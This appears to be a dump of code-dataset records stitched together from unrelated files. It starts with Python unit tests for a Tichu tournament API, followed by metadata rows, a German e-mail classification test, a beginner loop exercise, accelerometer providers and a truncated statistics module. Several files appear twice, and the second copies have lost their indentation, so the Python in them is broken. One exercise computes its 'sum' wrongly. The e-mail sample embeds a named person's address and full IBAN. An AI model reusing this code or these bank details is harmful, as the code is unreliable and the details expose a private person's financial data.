        response = self.testapp.head("/api/tournaments/{}/hands/25/2/3".format(id),
                                     expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.head("/api/tournaments/{}/hands/1/2a/3".format(id),
                                     expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.head("/api/tournaments/{}/hands/1/0/3".format(id),
                                     expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.head("/api/tournaments/{}/hands/1/9/3".format(id),
                                     expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.head("/api/tournaments/{}/hands/1/2/3a".format(id),
                                     expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.head("/api/tournaments/{}/hands/1/2/0".format(id),
                                     expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.head("/api/tournaments/{}/hands/1/2/9".format(id),
                                     expect_errors=True)
        self.assertEqual(response.status_int, 404)
    def testHead_present(self):
        # HEAD on an existing hand -> 200.
        self.loginUser()
        id = self.AddBasicTournament()
        self.AddBasicHand(id)
        self.logoutUser()
        response = self.testapp.head("/api/tournaments/{}/hands/1/2/3".format(id))
        self.assertEqual(response.status_int, 200)
    def testHead_not_present(self):
        # HEAD on a valid but unscored hand -> 204 (no content).
        self.loginUser()
        id = self.AddBasicTournament()
        self.AddBasicHand(id)
        self.logoutUser()
        response = self.testapp.head("/api/tournaments/{}/hands/2/2/3".format(id))
        self.assertEqual(response.status_int, 204)
    def testHead_deleted(self):
        # A deleted hand reads as absent (204) until it is re-added.
        self.loginUser()
        id = self.AddBasicTournament()
        self.AddBasicHand(id)
        response = self.testapp.delete("/api/tournaments/{}/hands/1/2/3".format(id))
        response = self.testapp.head("/api/tournaments/{}/hands/1/2/3".format(id))
        self.assertEqual(response.status_int, 204)
        self.AddBasicHand(id)
        response = self.testapp.head("/api/tournaments/{}/hands/1/2/3".format(id))
        self.assertEqual(response.status_int, 200)
    def testPut_bad_id(self):
        self.loginUser()
        id = self.AddBasicTournament()
        self.logoutUser()
        params = {'calls': {}, 'ns_score': 75, 'ew_score': 25}
        response = self.testapp.put_json("/api/tournaments/{}a/hands/1/2/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 404)
    def testPut_bad_parameters(self):
        # PUT with malformed/out-of-range board or pair numbers -> 404.
        self.loginUser()
        id = self.AddBasicTournament()
        self.logoutUser()
        params = {'calls': {}, 'ns_score': 75, 'ew_score': 25}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1a/2/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.put_json("/api/tournaments/{}/hands/0/2/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.put_json("/api/tournaments/{}/hands/25/2/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2a/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/0/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/25/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3a".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/0".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/35".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 404)
    def testPut_invalid_scoring(self):
        # Scores that don't add up / invalid Tichu calls -> 400.
        self.loginUser()
        id = self.AddBasicTournament()
        params = {'calls': {}, 'ns_score': 75, 'ew_score': 20}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 400)
        params = {'calls': {'north': 'G' }, 'ns_score': 75, 'ew_score': 25}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 400)
        params = {'calls': {'north': "T" }, 'ns_score': 60, 'ew_score': 40}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 400)
        params = {'calls': {'north': "T" }, 'ns_score': -30, 'ew_score': 130}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 400)
        params = {'ns_score': 0, 'ew_score': 0}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 400)
    def testPut_score_exists_not_logged_in(self):
        # Overwriting an existing score while logged out -> 403.
        self.loginUser()
        id = self.AddBasicTournament()
        params = {'calls': {}, 'ns_score': 75, 'ew_score': 25}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params)
        self.logoutUser()
        params = {'calls': {}, 'ns_score': 25, 'ew_score': 75}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 403)
    def testPut_score_exists_does_not_own(self):
        # A different user with a wrong pair code cannot overwrite -> 403.
        self.loginUser()
        id = self.AddBasicTournament()
        params = {'calls': {}, 'ns_score': 75, 'ew_score': 25}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params)
        self.loginUser('user2@example.com', '234')
        params = {'calls': {}, 'ns_score': 25, 'ew_score': 75}
        hand_headers = {'X-tichu-pair-code' : 'AAAA'}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params, headers=hand_headers,
                                         expect_errors=True)
        self.assertEqual(response.status_int, 403)
    def testPut_invalid_config(self):
        # Board/pair combination not in the movement config -> 400.
        self.loginUser()
        id = self.AddBasicTournament()
        params = {'calls': { 'north': "T" },
                  'ns_score': 75,
                  'ew_score': 25,
                  'notes': 'I am a note'}
        response = self.testapp.put_json("/api/tournaments/{}/hands/4/2/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 400)
    def testPut_null_calls(self):
        # 'calls' is optional; a score-only payload is accepted.
        self.loginUser()
        id = self.AddBasicTournament()
        params = {'ns_score': 75,
                  'ew_score': 25,
                  'notes': 'I am a note'}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params)
        self.assertEqual(response.status_int, 204)
    def testPut_avg_calls(self):
        # "AVG"-style scores are accepted case-insensitively with whitespace.
        self.loginUser()
        id = self.AddBasicTournament()
        params = {'calls': { 'north': "T" },
                  'ns_score' : ' aVg ',
                  'ew_score' : ' Avg+ '}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params)
        self.assertEqual(response.status_int, 204)
        params = {'ns_score' : 'avG++',
                  'ew_score' : 'avg-'}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params)
        self.assertEqual(response.status_int, 204)
        params = {'ns_score' : 'AVG--',
                  'ew_score' : 'avg '}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params)
        self.assertEqual(response.status_int, 204)
    def testPut_avg_calls_bad_input(self):
        # Mixing an AVG score with a numeric score -> 400.
        self.loginUser()
        id = self.AddBasicTournament()
        params = {'ns_score' : ' aVg ',
                  'ew_score' : 123}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params, expect_errors=True)
        self.assertEqual(response.status_int, 400)
    def testPut(self):
        # Full happy-path: create, overwrite (as owner and via pair code),
        # then add a second hand and verify both through the tournament GET.
        self.loginUser()
        id = self.AddBasicTournament()
        params = {'calls': { 'north': "T" },
                  'ns_score': 75,
                  'ew_score': 125,
                  'notes': 'I am a note'}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params)
        self.assertEqual(response.status_int, 204)
        # Test the hand is there
        response = self.testapp.get("/api/tournaments/{}".format(id))
        hand_list = json.loads(response.body)['hands']
        self.assertEqual(1, len(hand_list))
        self.assertEqual( { 'north': "T" }, hand_list[0]['calls'])
        self.assertEqual(75, hand_list[0]['ns_score'])
        self.assertEqual(125, hand_list[0]['ew_score'])
        self.assertEqual('I am a note', hand_list[0]['notes'])
        self.assertEqual(1, hand_list[0]['board_no'])
        self.assertEqual(2, hand_list[0]['ns_pair'])
        self.assertEqual(3, hand_list[0]['ew_pair'])
        # Override the hand.
        params = {'calls': {}, 'ns_score': 20, 'ew_score': 80}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params)
        self.assertEqual(response.status_int, 204)
        response = self.testapp.get("/api/tournaments/{}".format(id))
        self.CheckBasicTournamentMetadataUnchanged(json.loads(response.body))
        hand_list = json.loads(response.body)['hands']
        self.assertEqual(1, len(hand_list))
        self.assertEqual({}, hand_list[0]['calls'])
        self.assertEqual(20, hand_list[0]['ns_score'])
        self.assertEqual(80, hand_list[0]['ew_score'])
        self.assertIsNone(hand_list[0].get('notes'))
        self.assertEqual(1, hand_list[0]['board_no'])
        self.assertEqual(2, hand_list[0]['ns_pair'])
        self.assertEqual(3, hand_list[0]['ew_pair'])
        # Override the hand again but now as a logged out user with the right
        # credentials.
        response = self.testapp.get("/api/tournaments/{}/pairids/2".format(id))
        opaque_id = json.loads(response.body)['pair_id']
        self.logoutUser()
        params = {'calls': {}, 'ns_score': 25, 'ew_score': 75}
        hand_headers = {'X-tichu-pair-code' : str(opaque_id)}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params, headers=hand_headers)
        self.loginUser()
        self.assertEqual(response.status_int, 204)
        response = self.testapp.get("/api/tournaments/{}".format(id))
        self.CheckBasicTournamentMetadataUnchanged(json.loads(response.body))
        hand_list = json.loads(response.body)['hands']
        self.assertEqual(1, len(hand_list))
        self.assertEqual({}, hand_list[0]['calls'])
        self.assertEqual(25, hand_list[0]['ns_score'])
        self.assertEqual(75, hand_list[0]['ew_score'])
        self.assertIsNone(hand_list[0].get('notes'))
        self.assertEqual(1, hand_list[0]['board_no'])
        self.assertEqual(2, hand_list[0]['ns_pair'])
        self.assertEqual(3, hand_list[0]['ew_pair'])
        # Add a second hand, check that both hands are set correctly.
        params = {'calls': {'south': "T", 'east': "", 'west': "GT", 'north': ""},
                  'ns_score': -75,
                  'ew_score': 275}
        response = self.testapp.put_json("/api/tournaments/{}/hands/10/5/6".format(id),
                                         params)
        self.assertEqual(response.status_int, 204)
        response = self.testapp.get("/api/tournaments/{}".format(id))
        self.CheckBasicTournamentMetadataUnchanged(json.loads(response.body))
        hand_list = json.loads(response.body)['hands']
        self.assertEqual(2, len(hand_list))
        first_hand = self.GetHandFromList(hand_list, 1)
        self.assertEqual({}, first_hand['calls'])
        self.assertEqual(25, first_hand['ns_score'])
        self.assertEqual(75, first_hand['ew_score'])
        self.assertIsNone(first_hand.get('notes'))
        self.assertEqual(1, first_hand['board_no'])
        self.assertEqual(2, first_hand['ns_pair'])
        self.assertEqual(3, first_hand['ew_pair'])
        second_hand = self.GetHandFromList(hand_list, 10)
        self.assertEqual({'south': "T", 'east': "", 'west': "GT", 'north': ""},
                         second_hand['calls'])
        self.assertEqual(-75, second_hand['ns_score'])
        self.assertEqual(275, second_hand['ew_score'])
        self.assertIsNone(second_hand.get('notes'))
        self.assertEqual(10, second_hand['board_no'])
        self.assertEqual(5, second_hand['ns_pair'])
        self.assertEqual(6, second_hand['ew_pair'])
    def testDelete_not_logged_in(self):
        # DELETE requires authentication -> 401 when logged out.
        self.loginUser()
        id = self.AddBasicTournament()
        self.AddBasicHand(id)
        self.logoutUser()
        response = self.testapp.delete("/api/tournaments/{}/hands/1/2/3".format(id),
                                       expect_errors=True)
        self.assertEqual(response.status_int, 401)
    def testDelete_not_owner(self):
        # DELETE by a user who does not own the tournament -> 403.
        self.loginUser()
        id = self.AddBasicTournament()
        self.AddBasicHand(id)
        self.loginUser('user2@example.com', id='234')
        response = self.testapp.delete("/api/tournaments/{}/hands/1/2/3".format(id),
                                       expect_errors=True)
        self.assertEqual(response.status_int, 403)
    def testDelete_bad_parameters(self):
        # DELETE with malformed/out-of-range board or pair numbers -> 404.
        self.loginUser()
        id = self.AddBasicTournament()
        self.AddBasicHand(id)
        response = self.testapp.delete("/api/tournaments/{}a/hands/1a/2/3".format(id),
                                       expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.delete("/api/tournaments/{}/hands/1a/2/3".format(id),
                                       expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.delete("/api/tournaments/{}/hands/0/2/3".format(id),
                                       expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.delete("/api/tournaments/{}/hands/25/2/3".format(id),
                                       expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.delete("/api/tournaments/{}/hands/1/2a/3".format(id),
                                       expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.delete("/api/tournaments/{}/hands/1/0/3".format(id),
                                       expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.delete("/api/tournaments/{}/hands/1/9/3".format(id),
                                       expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.delete("/api/tournaments/{}/hands/1/2/3a".format(id),
                                       expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.delete("/api/tournaments/{}/hands/1/2/0".format(id),
                                       expect_errors=True)
        self.assertEqual(response.status_int, 404)
        response = self.testapp.delete("/api/tournaments/{}/hands/1/2/9".format(id),
                                       expect_errors=True)
        self.assertEqual(response.status_int, 404)
    def testDelete(self):
        # Deleting one hand leaves the other intact.
        self.loginUser()
        id = self.AddBasicTournament()
        # Add simple hand.
        self.AddBasicHand(id)
        # Add a second hand to make sure only the first one is deleted.
        params = {'calls': {}, 'ns_score': 25, 'ew_score': 75}
        response = self.testapp.put_json("/api/tournaments/{}/hands/2/2/3".format(id),
                                         params)
        response = self.testapp.delete("/api/tournaments/{}/hands/1/2/3".format(id))
        self.assertEqual(response.status_int, 204)
        response = self.testapp.get("/api/tournaments/{}".format(id))
        hand_list = json.loads(response.body)['hands']
        self.assertEqual(1, len(hand_list))
        self.assertEqual({}, hand_list[0]['calls'])
        self.assertEqual(25, hand_list[0]['ns_score'])
        self.assertEqual(75, hand_list[0]['ew_score'])
        self.assertIsNone(hand_list[0].get('notes'))
        self.assertEqual(2, hand_list[0]['board_no'])
        self.assertEqual(2, hand_list[0]['ns_pair'])
        self.assertEqual(3, hand_list[0]['ew_pair'])
    def loginUser(self, email='user@example.com', id='123', is_admin=False):
        """Simulate a logged-in GAE user via testbed environment variables."""
        self.testbed.setup_env(
            user_email=email,
            user_id=id,
            user_is_admin='1' if is_admin else '0',
            overwrite=True)
    def logoutUser(self):
        """Clear the simulated GAE user (logged-out state)."""
        self.testbed.setup_env(
            user_email='',
            user_id='',
            user_is_admin='',
            overwrite=True)
    def AddBasicTournament(self):
        """Create an 8-pair/24-board tournament; return its id."""
        params = {'name': 'name', 'no_pairs': 8, 'no_boards': 24,
                  'players': [{'pair_no': 2, 'name': "My name", 'email': "My email"},
                              {'pair_no': 7}]}
        response = self.testapp.post_json("/api/tournaments", params)
        self.assertNotEqual(response.body, '')
        response_dict = json.loads(response.body)
        id = response_dict['id']
        self.assertIsNotNone(id)
        return id
    def CheckBasicTournamentMetadataUnchanged(self, response_dict):
        """Assert the tournament metadata still matches AddBasicTournament."""
        self.assertEqual([{'pair_no': 2, 'name': "My name", 'email': "My email"},
                          {'pair_no': 7}],
                         response_dict['players'])
        self.assertEqual('name', response_dict['name'])
        self.assertEqual(8, response_dict['no_pairs'])
        self.assertEqual(24, response_dict['no_boards'])
    def AddBasicHand(self, id):
        """PUT a simple 75/25 hand on board 1 for pairs 2 (NS) and 3 (EW)."""
        self.loginUser()
        params = {'calls': {}, 'ns_score': 75, 'ew_score': 25}
        response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
                                         params)
        self.assertEqual(response.status_int, 204)
    def GetHandFromList(self, hand_list, board_no):
        """Return the hand dict with the given board_no, or None."""
        for hand in hand_list:
            if hand.get('board_no') == board_no:
                return hand
        return None
| 19,408 | 12 | 717 |
576fda55cc6908ed1c0d5f2b87e5c72699a1dbaa | 1,786 | py | Python | src/test.py | kumarnikhil936/MailClassification_NLTK_Sklearn_Flask_Docker | df919005e2ceafa1d90fb1ab0c302f2220e0906d | [
"MIT"
] | null | null | null | src/test.py | kumarnikhil936/MailClassification_NLTK_Sklearn_Flask_Docker | df919005e2ceafa1d90fb1ab0c302f2220e0906d | [
"MIT"
] | null | null | null | src/test.py | kumarnikhil936/MailClassification_NLTK_Sklearn_Flask_Docker | df919005e2ceafa1d90fb1ab0c302f2220e0906d | [
"MIT"
] | null | null | null | import yaml
from joblib import load
from nltk.corpus import stopwords
from nltk.stem.snowball import SnowballStemmer
from helpers import preprocess_single_text, load_mapping
text = "ki_erstattung_test_topf2.txt Details Activity ki_erstattung_test_topf2.txt Sharing Info. Who has access M General Info. System properties Type Text Size 496 bytes Storage used 496 bytes Location testcases Owner Marc Bachmann Modified Dec 15, 2021 by Marc Bachmann Opened 6:32 PM by me Created Dec 15, 2021 Description. No description Download permissions. Viewers can download From: Marijke Holtkamp <m.etzrodtgweb.de> To: tierarztrechnung@barmenia.de Subject Tierarztrechungen Sent Thu, 21 Oct 2021 14:28:46+0200 IMG 2798.JPG IMG_2799.JPG Sehr geehrte Damen und Herren, anbei sende ich Ihnen die Tierarztrechnung unserer Hündin Clara Tari mit der bitte um Erstattung: KreisSparkasse Köln DE 74 3705 0299 1152 0271 47 BIC COKSDE33xxX Vielen Dank.! Mit freundlichem Gruß Marijke Holtkamp"
# Language used for both the NLTK stop-word list and the Snowball stemmer.
stopwords_locale = 'german'
stemmer = SnowballStemmer(stopwords_locale)
stop_words = set(stopwords.words(stopwords_locale))
# Project-specific stop words curated by hand (YAML file).
with open('../dataset/stopwords.yaml', 'r') as f:
    curated_stop_words = yaml.safe_load(f)
# Normalise the raw e-mail text: stop-word removal plus stemming.
text = preprocess_single_text(text, stop_words=stop_words, curated_stop_words=curated_stop_words, stemming=True, stemmer=stemmer)
# Maps the classifier's class labels to human-readable category names.
mapping_dict = load_mapping(mapping_file='../dataset/mapping.yaml')
# load the saved pipeline model
for filename in ["../trained_models/model_logreg.sav", "../trained_models/model_sgd.sav"]:
    pipeline = load(filename)
    # predict on the text; build {category name: probability} for this model
    json_result = {}
    for cls, prob in zip(pipeline.classes_.tolist(), pipeline.predict_proba([text]).tolist().pop()):
        json_result[mapping_dict[cls]] = prob
print(filename, '\n', json_result) | 57.612903 | 801 | 0.787794 | import yaml
from joblib import load
from nltk.corpus import stopwords
from nltk.stem.snowball import SnowballStemmer
from helpers import preprocess_single_text, load_mapping
text = "ki_erstattung_test_topf2.txt Details Activity ki_erstattung_test_topf2.txt Sharing Info. Who has access M General Info. System properties Type Text Size 496 bytes Storage used 496 bytes Location testcases Owner Marc Bachmann Modified Dec 15, 2021 by Marc Bachmann Opened 6:32 PM by me Created Dec 15, 2021 Description. No description Download permissions. Viewers can download From: Marijke Holtkamp <m.etzrodtgweb.de> To: tierarztrechnung@barmenia.de Subject Tierarztrechungen Sent Thu, 21 Oct 2021 14:28:46+0200 IMG 2798.JPG IMG_2799.JPG Sehr geehrte Damen und Herren, anbei sende ich Ihnen die Tierarztrechnung unserer Hündin Clara Tari mit der bitte um Erstattung: KreisSparkasse Köln DE 74 3705 0299 1152 0271 47 BIC COKSDE33xxX Vielen Dank.! Mit freundlichem Gruß Marijke Holtkamp"
stopwords_locale = 'german'
stemmer = SnowballStemmer(stopwords_locale)
stop_words = set(stopwords.words(stopwords_locale))
with open('../dataset/stopwords.yaml', 'r') as f:
curated_stop_words = yaml.safe_load(f)
text = preprocess_single_text(text, stop_words=stop_words, curated_stop_words=curated_stop_words, stemming=True, stemmer=stemmer)
mapping_dict = load_mapping(mapping_file='../dataset/mapping.yaml')
# load the saved pipleine model
for filename in ["../trained_models/model_logreg.sav", "../trained_models/model_sgd.sav"]:
pipeline = load(filename)
# predict on the text
json_result = {}
for cls, prob in zip(pipeline.classes_.tolist(), pipeline.predict_proba([text]).tolist().pop()):
json_result[mapping_dict[cls]] = prob
print(filename, '\n', json_result) | 0 | 0 | 0 |
4f8e5b718a64351286c098419e412067fd72661c | 290 | py | Python | Lista3_11.py | AlessandroGoncalve/Lista3_Python | 68f18d0d0243b19e596df1309c502ae72fbaca37 | [
"MIT"
] | 12 | 2019-09-13T22:01:05.000Z | 2020-09-20T23:18:41.000Z | Lista3_11.py | AlessandroGoncalve/Lista3_Python | 68f18d0d0243b19e596df1309c502ae72fbaca37 | [
"MIT"
] | 1 | 2020-04-04T03:36:44.000Z | 2020-10-21T20:57:38.000Z | Lista3_11.py | AlessandroGoncalve/Lista3_Python | 68f18d0d0243b19e596df1309c502ae72fbaca37 | [
"MIT"
] | 12 | 2019-09-10T18:48:25.000Z | 2020-10-24T18:35:13.000Z | #Altere o programa anterior para mostrar no final a soma dos números.
# Exercise: print the numbers strictly between the two inputs (whichever
# order they were given in), then show the sum of the two numbers.
n1 = int(input("Digite um número: "))
n2 = int(input("Digite outro número: "))
# Exactly one of these ranges is non-empty (both empty when |n1 - n2| <= 1).
for i in range(n1 + 1, n2):
    print(i)
for i in range(n2 + 1, n1):
    print(i)
# BUG FIX: the original printed `i + i` (twice the last loop value, and a
# NameError when both ranges were empty); the exercise asks for n1 + n2.
print("Soma dos números: ", n1 + n2)
| 22.307692 | 70 | 0.593103 | #Altere o programa anterior para mostrar no final a soma dos números.
n1 = int(input("Digite um número: "))
n2 = int(input("Digite outro número: "))
for i in range(n1 + 1, n2):
print(i)
for i in range(n2 + 1, n1):
print(i)
print("Soma dos números: ", i + i)
| 0 | 0 | 0 |
bf752a0fbeb6d507311d56e1f4e724814a0350b1 | 1,538 | py | Python | packages/attitude.pkg/providers.py | GrahamCobb/maemo-mud-builder | 7bc03f5a1734a2b256e31808032d079c3e1e5720 | [
"ClArtistic"
] | null | null | null | packages/attitude.pkg/providers.py | GrahamCobb/maemo-mud-builder | 7bc03f5a1734a2b256e31808032d079c3e1e5720 | [
"ClArtistic"
] | null | null | null | packages/attitude.pkg/providers.py | GrahamCobb/maemo-mud-builder | 7bc03f5a1734a2b256e31808032d079c3e1e5720 | [
"ClArtistic"
] | null | null | null | #
# Provider information sources for `Attitude' - a false horizon display using
# accelerometer information. (c) Andrew Flegg 2009
# Released under the Artistic Licence
import os.path
from math import sin, cos, pi
class Dummy:
"""One of the simplest providers: returns dead-on, flat."""
class Demo:
"""A demonstration provider which will take the user on a tour through
the air."""
x = 0.0
y = 0.0
z = 0.0
class NokiaAccelerometer:
"""An accelerometer provider which actually reads an RX-51's
accelerometers, based on http://wiki.maemo.org/Accelerometers"""
global ACCELEROMETER_PATH
ACCELEROMETER_PATH = '/sys/class/i2c-adapter/i2c-3/3-001d/coord'
@classmethod
| 29.018868 | 79 | 0.574122 | #
# Provider information sources for `Attitude' - a false horizon display using
# accelerometer information. (c) Andrew Flegg 2009
# Released under the Artistic Licence
import os.path
from math import sin, cos, pi
class Dummy:
    """Static provider: always reports the same fixed orientation.

    Other handy fixed readings for testing: (0, 0, -1000) back down,
    (0, 0, 1000) front down, (-1000, 0, 0) right edge down,
    (1000, 0, 0) left edge down, (0, -1000, 0) bottom edge down.
    """

    # Fixed reading: bottom-right corner down.
    _FIXED = (-500, -500, 0)

    def position(self):
        """Return the constant (x, y, z) accelerometer reading."""
        return self._FIXED
class Demo:
    """Scripted provider that sweeps the horizon around as if in flight."""

    # Phase accumulators for the three sine waves.  They are class-level
    # defaults; each instance acquires its own copies on the first call.
    x = 0.0
    y = 0.0
    z = 0.0

    def position(self):
        """Advance the animation one step and return the new (x, y, z)."""
        self.x, self.y, self.z = self.x + 0.1, self.y + 0.04, self.z + 0.03
        return (sin(self.x) * 350,
                sin(self.y) * 400 - 100,
                sin(self.z) * 450)
class NokiaAccelerometer:
    """An accelerometer provider which actually reads an RX-51's
    accelerometers, based on http://wiki.maemo.org/Accelerometers"""
    # NOTE: `global` at class scope deliberately publishes the path as a
    # module-level constant; other code may rely on that, so it is kept.
    global ACCELEROMETER_PATH
    ACCELEROMETER_PATH = '/sys/class/i2c-adapter/i2c-3/3-001d/coord'

    def position(self):
        """Read one (x, y, z) sample from the kernel's sysfs coord file.

        Returns a list of ints.  FIX: uses ``with`` so the file handle is
        closed even when a value fails to parse (the original leaked the
        handle if ``int()`` raised).
        """
        with open(ACCELEROMETER_PATH, 'r') as f:
            return [int(w) for w in f.readline().split()]

    @classmethod
    def available(cls):
        """Return True when the sysfs file exists, i.e. we run on an RX-51."""
        return os.path.isfile(ACCELEROMETER_PATH)
| 639 | 0 | 114 |
9611e85309601b1043038f0147966d80aa76dc29 | 4,953 | py | Python | final_project.py | nikmoon/RecursiveStat | f1a31a70da3278ca4ada3dfa83875258170ce602 | [
"MIT"
] | null | null | null | final_project.py | nikmoon/RecursiveStat | f1a31a70da3278ca4ada3dfa83875258170ce602 | [
"MIT"
] | null | null | null | final_project.py | nikmoon/RecursiveStat | f1a31a70da3278ca4ada3dfa83875258170ce602 | [
"MIT"
] | null | null | null | # эти строки введены для IDE, их нужно закомментировать или удалить
"""
Список метрик и соответствующих им методов
"""
metrics = {
'productType': {
'method': getProductType,
'name': 'productType', # данное поле нужно использовать для названия вложенного поля
},
'productColor': {
'method': getProductColor,
'name': 'productColor',
},
'productCondition': {
'method': getProductCondition,
'name': 'productCondition',
}
}
"""
Список веток
"""
branches = {
'branch1': 'price==Low,condition==New',
'branch2': 'price==Medium,color==Red',
'branch3': 'color==Blue,price==High',
}
def getStatistics(strStats, values, globalFilter, limit=None, offset=None):
"""
:param strStats: 'productType;branch1;productColor;branch2;branch3;productCondition'
:param values: 'sklad1,sklad2'
:param globalFilter: ''
:param limit:
:param offset:
:return:
"""
def getRecursive(lvl=0, listStatFilter=[], statIndex=0):
"""
:param lvl: текущий уровень вложенности
:param listStatFilter: список предыдущих метрик, для которых получены статистики
:return: Возвращается список из двух элементов: ['имя метрики', [список статистик для метрики]]
Например: ['productType', [{'label': 'Окна', 'segment': 'productType==Окна',...}, {...}, ...]
listStats и listValues берутся из внешней функции
"""
# условие выхода из рекурсии - необходимо для случая, когда listStats изначально пустой
if statIndex == len(listStats):
return None
# формируем фильтр
filter = ';'.join(listStatFilter + globalFilter)
# берем очередную метрику, для которой нужна статистика
curStat = listStats[statIndex]
# если текущая метрика - branch
if curStat.startswith('branch'):
nameMetric = 'branch'
listBranches = [curStat]
# выбираем все идущие подряд бранчи
while statIndex < (len(listStats) - 1):
statIndex += 1
if not listStats[statIndex].startswith('branch'):
statIndex -= 1
break
listBranches.append(listStats[statIndex])
listBranches.append('All data') # для ветки 'All data'
# здесь мы имеем список с названиями бранчей, можно получить статистику для них
data = []
for branch in listBranches:
query = {
'method': 'branch', # значение указыает на то, что это запрос для бранча
'branch': branch,
'values': values,
'filter': filter,
'limit': None, # limit и offset тоже не имеют смысла в данной ветке
'offset': None,
}
data.append(get_stat_api([query])[0][0])
# если текущая метрика - обычная, например 'productType'
else:
nameMetric = metrics[curStat]['name']
list_of_queries = [{
'method': metrics[nameMetric]['method'],
'values': values,
'filter': filter,
'limit': limit if lvl == 0 else None,
'offset': offset if lvl == 0 else None,
}]
data = get_stat_api(list_of_queries)[0]
# условие выхода из рекурсии - достигнут конец списка listStats
if (statIndex + 1) == len(listStats):
return [nameMetric, data]
# если у нас есть вложенные бранчи, то здесь самое место для их обработки
if listStats[statIndex + 1] == 'subbranch':
statIndex += 1 # просто пропускаем данный элемент списка
# здесь у нас есть список статистик в data и соответствующее им название метрики
for item in data:
# если текущий элемент не имеет поля 'segment', для него рекурсия закончена - он последний в цепочке
if 'segment' not in item:
continue
result = getRecursive(lvl + 1, listStatFilter + [item['segment']], statIndex + 1)
# вот здесь result[0] как раз равно metrics[metricName]['name']
item[result[0]] = result[1]
return [nameMetric, data]
# для корректной обработки вложенных бранчей типа branch1,branch2|branch3
# заменим разделяющий знак дополнительной "виртуальной" метрикой, чтобы получился примерно
# такой список ['branch1', 'branch2', 'subbranch', "branch3"]
strStats = strStats.replace('|', ',subbranch,')
# преобразовываем строку с необходимыми статистиками в список,
# сначала удалив все пробелы из строки
listStats = strStats.replace(' ', '').split(',')
return {
'stats': getRecursive()[1],
}
| 35.633094 | 112 | 0.592166 | # эти строки введены для IDE, их нужно закомментировать или удалить
# IDE-only stand-ins for names provided elsewhere at runtime; the author's
# note at the top of the file says to comment these out or remove them.
def getProductType(): pass
def getProductColor(): pass
def getProductCondition(): pass
def get_stat_api(list_of_queries): pass
"""
Список метрик и соответствующих им методов
"""
# (The bare string above reads: "List of metrics and their corresponding methods".)
metrics = {
    'productType': {
        'method': getProductType,
        'name': 'productType', # use this field as the name of the nested result field
    },
    'productColor': {
        'method': getProductColor,
        'name': 'productColor',
    },
    'productCondition': {
        'method': getProductCondition,
        'name': 'productCondition',
    }
}
"""
Список веток
"""
# (The bare string above reads: "List of branches".)
branches = {
    'branch1': 'price==Low,condition==New',
    'branch2': 'price==Medium,color==Red',
    'branch3': 'color==Blue,price==High',
}
def getStatistics(strStats, values, globalFilter, limit=None, offset=None):
    """
    Build a (possibly nested) statistics tree for the requested metrics.

    :param strStats: comma-separated metric/branch names, e.g.
